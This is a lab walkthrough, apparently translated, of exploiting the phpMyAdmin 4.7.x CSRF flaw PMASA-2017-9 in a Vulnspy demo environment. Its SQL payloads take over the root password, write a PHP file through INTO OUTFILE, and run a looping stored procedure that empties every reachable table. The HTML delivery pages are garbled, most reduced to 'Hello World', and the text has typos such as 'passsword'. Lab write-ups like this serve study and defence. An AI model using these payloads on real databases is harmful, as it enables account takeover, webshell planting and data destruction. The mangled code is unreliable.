PhpMyAdmin 4.7.x CSRF Exploit

PhpMyAdmin 4.7.x CSRF Exploit phpMyAdmin

phpMyAdmin is a MySQL database management tool based on php++ (an open source scripting language) + +, which is architected in Web-base way on the Web site host, allowing the manager to manage the MySQL database using the Web interface. This web interface can be an easy way to enter complex SQL syntax, especially to handle the import and export of large amounts of data. One of the bigger advantages is that because phpMyAdmin is executed on the Web server like any other PHP program, you can use the HTML pages generated by these programs anywhere, that is, to manage the MySQL database remotely, to easily create, modify, and delete databases and data tables. It is also possible to build common PHP syntax by phpMyAdmin, which is convenient for writing web pages with the correct SQL syntax

CSRF (pmasa-2017-9) vulnerability

The phpMyAdmin team fixed a serious csrf Vulnerability (PMASA-2017-9) in version 4.7.7, where an attacker could silently execute arbitrary SQL statements by inducing an administrator to visit a malicious page.

We can be familiar with the exploit of this vulnerability by combining Vulnspy's online phpmyadmin environment.

Process

Online PhpMyAdmin CSRF
(PS: Note: Restart demo target drone to reset target drone)

1. Create PhpMyAdmin Environment Online

Click Create Vulnspy provided to create target drone address (https://www.vsplate.com/?github=vulnspy/PMASA-2017-9)

When you jump to Vsplate, you can automatically create a phpMyAdmin environment by simply clicking the Go button.

Open the link to the demo address and our phpMyAdmin is created.

Use account root, password Toor, login phpMyAdmin. Based on the page information, we can find that the current version of PhpMyAdmin is 4.7.6, just matching the phpMyAdmin version of the vulnerability.

2.CSRF exploit-Modify current database user password

If you want to use CSRF to delete or modify database content, you need to know the database name, table name, and field name in advance. This is a bit complicated to use, and the success rate is limited, so I made two more general ways to use it.

Using SQL statements to modify the current user password is supported in MySQL. For example, the current user password is modified to the www.vulnspy.com corresponding SQL statement is:

SET passsword=PASSWORD(‘www.vulnspy.com‘);

Demo: 2.1 Impersonation Administrator Login phpMyAdmin status

Log in phpMyAdmin with the account root password Toor.

2.2 Create a page that contains malicious code.

First create an HTML file:vi 2.payload.html

Simply let him show HelloWorld, because the purpose is to let him open, the content is not important.
The code is as follows:

<p>Hello World</p>

2.3 Open a file containing malicious code in a browser 2.payload.html

Immediately after we go back to the 2.1 open interface, found that has automatically exited, and with the original password Toor has been unable to login

2.4 Login success with password www.vulnspy.com indicates successful use

3.CSRF Exploit-Write file

MySQL supports writing query results to a file, which we can use to write to the ++php++ file. For example <?php phpinfo();?> , to write code to the file/var/www/html/test.php, the corresponding SQL statement is:

select ‘<?php phpinfo();?>‘ into outfile ‘/var/www/html/test.php‘;

Demo: 3.1 Modifying code

<p>Hello World</p>‘ into outfile ‘/var/www/html/test.php‘;" style="display:none;" />

3.2 Open a file containing malicious code with a browser 3.3 access test.php

4 CSRF exploit-clear all data sheets

How to do a wide range of damage and have a direct impact, we can use SQL statements to empty the current MySQL user can manipulate all the data tables.
1) Get Data name and table name

SELECT CONCAT(‘DELETE FROM ‘,TABLE_SCHEMA,‘.‘,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE ‘%_schema‘ and TABLE_SCHEMA!=‘mysql‘ LIMIT 0,1

2) stitching it into a DELETE statement and executing the generated DELETE statement with execute:

set @del = (SELECT CONCAT(‘DELETE FROM ‘,TABLE_SCHEMA,‘.‘,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE ‘%_schema‘ and TABLE_SCHEMA!=‘mysql‘ LIMIT 0,1);prepare stmt from @del;execute stmt;

3) Execute executes only one SQL statement at a time, so we can use loop statements to execute each

DROP PROCEDURE IF EXISTS EMPT;DELIMITER $$    CREATE PROCEDURE EMPT()    BEGIN        DECLARE i INT;        SET i = 0;        WHILE i < 100 DO            SET @del = (SELECT CONCAT(‘DELETE FROM ‘,TABLE_SCHEMA,‘.‘,TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE ‘%_schema‘ and TABLE_SCHEMA!=‘mysql‘ LIMIT i,1);            PREPARE STMT FROM @del;            EXECUTE STMT;            SET i = i +1;        END WHILE;    END $$DELIMITER ;CALL EMPT();

Demo: 4.1 Payload as follows

<p>Hello World</p>

4.2 Open a file containing malicious code in a browser 4.3 go back to PhpMyAdmin to view the data

Hey?? We found that the data in database Vulnspy_tables and database vulnspy_test has been emptied.

PhpMyAdmin 4.7.x CSRF Exploit